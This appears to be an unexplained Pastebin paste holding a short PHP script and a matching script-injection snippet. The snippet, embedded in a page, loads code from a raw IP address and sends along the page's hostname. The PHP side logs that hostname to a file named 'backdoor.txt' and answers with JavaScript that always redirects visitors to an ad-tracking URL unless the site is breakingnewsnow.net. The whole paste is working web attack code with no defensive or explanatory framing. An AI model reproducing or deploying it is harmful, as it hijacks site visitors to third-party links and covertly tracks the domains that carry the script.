Advertisement
Guest User

Untitled

a guest
May 5th, 2016
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. <?php
  2. $ip = $_SERVER['REMOTE_ADDR'];
  3. $t = $_GET['t'];
  4. $domain = "breakingnewsnow.net";
  5. if($t == $domain){
  6. echo "Same";
  7. }else{
  8. file_put_contents('backdoor.txt', "$t\r\n", FILE_APPEND);
  9. echo "if(window.location.host != 'http://breakingnewsnow.net'){ var rand=Math.floor(Math.random()*3); if (rand <= 10){ location.replace('http://vagd4.voluumtrk.com/5d1f4a6f-b6ad-48f8-8fd0-6899a0ee3743'); }}";
  10. }
  11. ?>
  12.  
  13. ############################################################
  14.  
  15. <script>var myUrl = "http://104.131.115.21/b.php?t=";
  16. var b = myUrl + document.location.hostname;
  17. document.write("<script src=" + b + ">");
  18. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement